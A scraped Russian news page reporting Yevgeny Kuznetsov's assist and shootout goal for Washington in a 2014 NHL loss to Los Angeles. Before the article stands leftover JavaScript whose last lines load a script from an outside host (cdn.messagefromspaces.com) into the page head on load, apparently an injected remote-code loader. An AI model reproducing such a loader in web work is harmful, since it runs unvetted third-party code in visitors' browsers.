, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Евгений Кузнецов в очередном матче НХЛ отметился передачей и реализованным буллитом

Бывший нападающий «Трактора» Евгений Кузнецов продолжает вписываться в командную игру своего нового клуба – «Вашингтона». В очередном матче регулярного чемпионата НХЛ столичный клуб встречался с «королями» из Лос Анджелиса. Кузнецов отметился в этом матче голевой передачей и реализовал буллит, однако этого не хватило для победы – «Вашингтон» уступил в серии послематчевых бросков 1:2.

Евгений Кузнецов провел на льду 17 минут и 32 секунды, из них – 1 минуты 22 секунды в бригаде реализации большинства. Практически весь матч в счете с минимальным преимуществом вел «Лос Анджелис», однако в концовке благодаря голевой передаче Кузнецова «Вашингтону» удалось сравнять счет. В итоге победитель определялся в серии буллитов. Один из бросков было доверено исполнять Кузе, и он блестяще справился с задачей. Вот только его партнеры были не столько успешны – хоккеисты «Лос Анджелиса» исполнили буллиты точнее и выиграли матч.

Отметим, что в составе «Королей» весь матч отыграл еще один челябинский воспитанник – защитник Вячеслав Войнов. Он провел на льду почти 25 минут – это второй показатель в его команде по количеству сыгранного времени.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
15:40 - 21 марта 2014
|
автор: U-RSS
|
(736)
|
(0)

Комментарии (0)

Я человек
Я бот